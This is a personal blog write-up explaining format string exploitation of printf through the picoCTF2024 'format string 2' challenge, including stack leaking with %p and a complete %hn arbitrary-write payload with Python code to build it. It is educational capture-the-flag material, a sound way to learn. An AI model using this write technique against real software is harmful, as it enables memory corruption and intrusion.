Tom Kroll

Learning about programming, reverse engineering, binary exploitation, and everything else I can about cybersecurity


Format String Vulnerability Exploitation

22 Dec 2024

When learning about vulnerabilities in the printf function, I could not find any material which explained the subject in a way that was easy for me to understand. I wanted to learn how to craft a printf payload myself, but the guides I found either relied on scripts or were not well-written. Hopefully this guide will be useful to anyone else learning about this method and help to solidify the concept in my own mind.

printf

The printf function prints a string to the screen and interprets directives called "format specifiers" within that string to insert formatted values. The safe way to print a user's input is something like printf("User input is %s", userInput), which treats userInput purely as data to be printed as a string. The function becomes vulnerable when it is used as printf(userInput), because the user's input then becomes the format string itself and any format specifiers the user entered are interpreted. Compilers can warn about code written like this; GCC, for example, reports "format not a string literal and no format arguments" when -Wformat-security is enabled.

The following format specifiers are useful for exploiting this vulnerability:

%d - prints a value from the stack in decimal format
%x - prints a value from the stack in hexadecimal format
%p - also prints in hexadecimal, but appears as a pointer beginning with 0x
%s - uses stack value as a pointer to print a string from memory
%ic - prints one character padded to a total width of i characters (e.g., %100c will print 99 spaces followed by a single character, 100 characters in total)
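
The width behaviour of %c is easy to check without compiling anything. Python's %-style string formatting happens to follow the same width rule for %c, so the sketch below uses it as a stand-in. This is Python rather than the C printf, and is only meant as an illustration of how the width pads the output.

```python
# Python's %-formatting pads %c to the given width, much like C's printf.
padded = "%100c" % "A"

print(len(padded))        # total number of characters produced
print(padded.count(" "))  # how many of them are padding spaces
print(repr(padded[-1]))   # the character itself comes last
```

The total length is what matters for the exploit, because %n counts every character printed, padding included.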

The format specifiers below are all variants of %n for different data sizes. The %n format specifier prints nothing itself. Instead, it writes the total number of characters printed so far to the memory address supplied as its argument (this will be explained in more detail later).
%lln - 8 bytes
%n - 4 bytes
%hn - 2 bytes
%hhn - 1 byte. In this context, one byte is one character such as A, a hexadecimal value such as 0x41, or a decimal value such as 65.
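
To make the size differences concrete, here is a minimal Python sketch of the value each variant would store for a given character count. The helper name value_written is made up for this illustration, the sizes are the ones listed above (typical for 64-bit Linux), and the sketch assumes the count is simply truncated to the width of the target.

```python
# Sizes in bytes for each %n variant, as listed above.
SIZES = {"%hhn": 1, "%hn": 2, "%n": 4, "%lln": 8}


def value_written(count: int, specifier: str) -> int:
    """Return the value stored for `count` printed characters,
    assuming the count is truncated to the specifier's width."""
    bits = 8 * SIZES[specifier]
    return count & ((1 << bits) - 1)


count = 27750  # example character count (0x6c66)
for spec in ("%hhn", "%hn", "%n", "%lln"):
    print(spec, hex(value_written(count, spec)))
```

With a count of 27750, %hhn would keep only the lowest byte (0x66), while the wider variants store the whole value 0x6c66.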

Example

For this example, I will be using the picoCTF2024 challenge "format string 2". This challenge includes the binary file "vuln" and the source code file "vuln.c". Here is a sample of the code relevant to solving the challenge:

At the top we can see the variable sus is initialized to a value of 0x21737573. However, down at line 18 it seems that sus needs to be 0x67616c66 for the program to return a flag. On line 14 we can also see the vulnerability we will be taking advantage of, "printf(buf);". To begin, we will need to locate where the sus variable is in memory. This can be accomplished by using objdump on the "vuln" binary:

Now we know that the variable sus is stored in memory at the address 0x404060, or 00 00 00 00 00 40 40 60 when written out as a full 8-byte value. We can make a note of this and come back to it later.

OK, now let's start gathering some information using format specifiers within the program. The program echoes back whatever string is entered at the prompt. If %p is entered, we get a hex value in return:

In this case, 0x402075 is a memory location where a string from the program is stored. Here is what happens when %s is used instead:

If the value in this stack slot were not a pointer to a string, it would result in a segmentation fault. This is also the case with %n. Both %s and %n must find a valid memory address in the stack slot they reference or the program will crash.

To get more information from the stack, %p can be spammed to show multiple stack values:

I used a pipe to separate entries instead of a space because this particular program stops reading input at the first whitespace character, so anything after a space would be cut off.

Another feature of format specifiers that is essential to exploiting this vulnerability is the $ symbol. It lets us select a specific position on the stack, and it works with other format specifiers, including %n. In the previous example, the eighth value on the stack was 0x9. This can be accessed directly by including the position in the %p specifier. By entering %8$p we get:

Now we need to figure out where the string we are entering ends up on the stack. I will enter AAAAAAAA to fill one entire 8-byte stack slot and then spam %p:
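
Probe strings like these can be generated rather than typed by hand. The sketch below is one way to do it in Python. The function names build_probe and build_positional are made up for this example, and the pipe separator is used only because it contains no whitespace.

```python
def build_probe(marker: str = "AAAAAAAA", count: int = 20, sep: str = "|") -> str:
    """Return a marker followed by `count` %p specifiers,
    joined by a separator that contains no whitespace."""
    return sep.join([marker] + ["%p"] * count)


def build_positional(index: int, conversion: str = "p") -> str:
    """Return a specifier that reads one specific stack position, e.g. %14$p."""
    return f"%{index}${conversion}"


print(build_probe(count=3))
print(build_positional(14))
```

The first call prints AAAAAAAA|%p|%p|%p and the second prints %14$p. Raising count shows more of the stack in a single run.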

Here we can see our AAAAAAAA string converted to the hex value 0x4141414141414141 in the 14th location (0x41 is the ASCII code for A). You can also see where the %p entries spilled over into the following stack slots. Let's verify that 14 is the correct location with %14$p:
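
The link between the marker and the leaked value can be checked offline. The Python sketch below converts the marker bytes into the form %p would print, then searches pipe-separated output for it. Both helper names are made up for this example, and the code assumes the output has the shape marker|value|value|..., so that the n-th value corresponds to stack position n.

```python
def marker_as_pointer(marker: bytes) -> str:
    """Return the marker as %p would print it on a little-endian machine."""
    return hex(int.from_bytes(marker, "little"))


def find_marker_slot(leak: str, marker: bytes = b"AAAAAAAA", sep: str = "|"):
    """Return the 1-based position of the marker among the leaked values,
    or None if it does not appear."""
    target = marker_as_pointer(marker)
    values = leak.split(sep)[1:]  # drop the echoed marker itself
    for position, value in enumerate(values, start=1):
        if value.strip() == target:
            return position
    return None


print(marker_as_pointer(b"AAAAAAAA"))
```

As a usage example with made-up output (not taken from the challenge), find_marker_slot("AAAAAAAA|0x1|(nil)|0x4141414141414141") returns 3.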

OK, this looks good. The program returned AAAAAAAA, and in place of %14$p we got 0x4141414141414141. Now we will put everything together and possibly break your brain. The goal is simple: we need to overwrite the value at memory location 0x404060 with the value 0x67616c66. The solution is simple as well, but may not be easily understood at first. Overwriting the memory location with our value is accomplished using a combination of %c and %hn. First, %c with a width is used to print a chosen number of characters, which raises printf's running count of printed characters to the number we want to write. Next, %hn writes that count to memory at an address which we will also include in the string. Just as AAAAAAAA showed up on the stack as 0x4141414141414141, the address bytes we enter will sit on the stack where %hn can use them as a pointer. The 2-byte %hn specifier is used because writing 0x67616c66 in one go would mean printing its full decimal value in characters, which is too large to be practical: 0x67616c66 is 1,734,437,990 in decimal.

This would result in roughly 1.7 billion characters being printed to the screen! By breaking the value into 2-byte chunks, the results are much more manageable: the upper half 0x6761 is 26465 in decimal and the lower half 0x6c66 is 27750.
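
The split can be double-checked with a few lines of Python. This is just arithmetic on the target value from the challenge; the variable names are my own.

```python
target = 0x67616c66  # value that sus must hold

print(target)  # the full value in decimal: 1734437990

low = target & 0xFFFF           # lower 2 bytes
high = (target >> 16) & 0xFFFF  # upper 2 bytes

print(hex(high), high)  # 0x6761 26465
print(hex(low), low)    # 0x6c66 27750
```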

Now we can begin crafting our payload. We will begin with the smaller number because the count of printed characters only ever increases: each later write uses a larger total, and its %c width is that total minus everything already printed. So the payload will begin with %26465c%$hn, which includes our first value with the %c specifier and the %hn specifier to write it to memory. We will add a location for %hn later because it is not yet clear where on the stack our memory address string will be stored. To calculate the second width, we subtract the first value from the second, because %hn writes the total number of characters printed so far and we have already printed 26,465 of them. This makes our second width 27750 - 26465 = 1285, making the second portion of the payload %1285c%$hn.
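
The ordering and subtraction can be written as a small helper. This is a minimal sketch: the name widths_for is made up, and it assumes the values are distinct and non-zero, since a width of zero would still print one character.

```python
def widths_for(values):
    """Return (value, width) pairs in ascending order of value, where
    width is the number of extra characters to print before each write."""
    printed = 0
    plan = []
    for value in sorted(values):
        plan.append((value, value - printed))
        printed = value
    return plan


print(widths_for([0x6c66, 0x6761]))  # [(26465, 26465), (27750, 1285)]
```

Each pair holds the running total that %hn will write and the width to put in front of the c in the matching %c specifier.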

OK, so far that makes our payload %26465c%$hn%1285c%$hn. Now, we need to add the memory addresses where these values will be written. The addresses go at the end of the payload because printf stops processing the format string at the first null byte. The first value written will be 26465, which is the decimal representation of the upper half (0x6761) of the value that needs to be written. Because we are writing 4 bytes to the address 0x404060 and the data is split into 2-byte chunks, these upper two bytes will be written to an address two bytes higher, at 0x404062. Because of the endianness, that address needs to be entered with its bytes in reverse order as \x62\x40\x40\x00\x00\x00\x00\x00.

I know that the way this address is written is not intuitive, but because of the zeroes in the address and the fact that we cannot type null bytes at the prompt, we are not able to enter the address by hand. I tried numerous ways of doing this and it is just not possible without passing the string into the program through something like Python. If we were using addresses without zeroes, we should be able to get away with writing an address such as 0xffffffffff404060 as `@@ÿÿÿÿÿ, which would be stored as those bytes in reverse order because of the endianness.

The next two bytes of the value (0x6c66) will be written to the lower portion of the address at 0x404060, making our total payload so far %26465c%$hn%1285c%$hn\x62\x40\x40\x00\x00\x00\x00\x00\x60\x40\x40\x00\x00\x00\x00\x00, which extends past stack location 14 into the following slots. Now we need to calculate where those locations are and enter them into the %hn specifiers.
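
Reversing the address bytes by hand is error-prone, so here is a short Python sketch that uses the standard struct module to produce them. The variable names are my own, and the "<Q" format means an 8-byte little-endian unsigned integer.

```python
import struct

SUS_ADDR = 0x404060  # address of sus found with objdump

high_half_addr = struct.pack("<Q", SUS_ADDR + 2)  # receives 0x6761
low_half_addr = struct.pack("<Q", SUS_ADDR)       # receives 0x6c66

print(high_half_addr.hex(" "))  # 62 40 40 00 00 00 00 00
print(low_half_addr.hex(" "))   # 60 40 40 00 00 00 00 00
```

The printed bytes match the \x62\x40\x40... and \x60\x40\x40... sequences in the payload. Note that bytes.hex with a separator requires Python 3.8 or newer.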

If we start at the location where we know our input string begins and count in 8-byte increments, it is easy to figure out in which stack slot each portion of our string will land. As it stands now, the 21-character format portion ends partway through slot 16, so part of the first memory address is in slot 16. After adding the four characters for the two-digit stack locations in the %hn specifiers, the first memory address would start mid-slot at location 17 and overflow into 18, which would result in a segmentation fault because %hn would not be using a valid address. Because of this we can add some padding. This can be any character, but I'll just use some As like before:
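
The counting can also be done in code. The sketch below takes the format portion of the payload and reports how much padding rounds it up to an 8-byte boundary, and in which stack position the first address then lands. The helper name padding_and_slot is made up, and the starting position of 14 is the one found earlier with the AAAAAAAA probe.

```python
def padding_and_slot(fmt: str, first_slot: int = 14, slot_size: int = 8):
    """Return (padding_length, slot_of_first_address) for a format string
    that begins at stack position `first_slot`."""
    padding = -len(fmt) % slot_size
    slot = first_slot + (len(fmt) + padding) // slot_size
    return padding, slot


print(padding_and_slot("%26465c%18$hn%1285c%19$hn"))  # (7, 18)
```

The positions written into the specifiers (18 and 19 here) add to the string's length, so it is worth re-running the check after filling them in to confirm the result still agrees.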

After filling stack locations into the %hn specifiers and padding the string with AAAAAAA, our first 8 byte memory address will fit perfectly into slot 18 and the second into 19. Now we are ready to go! All we need to do is pass our string into python and out into netcat:
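
For reference, here is a minimal Python sketch that assembles the pieces described above into raw bytes. The function names are my own, and this is one possible way to build the string rather than the exact command used for the challenge.

```python
import struct

SUS_ADDR = 0x404060  # address of sus found with objdump


def build_payload() -> bytes:
    """Assemble the format portion, padding, and the two target addresses."""
    fmt = b"%26465c%18$hn%1285c%19$hn"
    padding = b"A" * 7                      # rounds the format up to 32 bytes
    addresses = (struct.pack("<Q", SUS_ADDR + 2)   # position 18: upper half
                 + struct.pack("<Q", SUS_ADDR))    # position 19: lower half
    return fmt + padding + addresses


def write_payload(stream) -> None:
    """Write the payload plus a newline to a binary stream."""
    stream.write(build_payload() + b"\n")
    stream.flush()


print(build_payload())
```

To send it, write_payload(sys.stdout.buffer) could be called from a script (after importing sys) and the script's output piped into netcat, using the host and port given for your challenge instance.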

Resulting in a flag!

I hope that this write-up helped you if you are struggling to understand the concept of printf vulnerability exploitation. I struggled for quite a few days trying to piece together information from any article I could find on the subject. Many articles either relied entirely on pwntools scripts or included unnecessary characters in the payload. Researching the subject and writing this article will definitely help to make me a better developer and security professional!

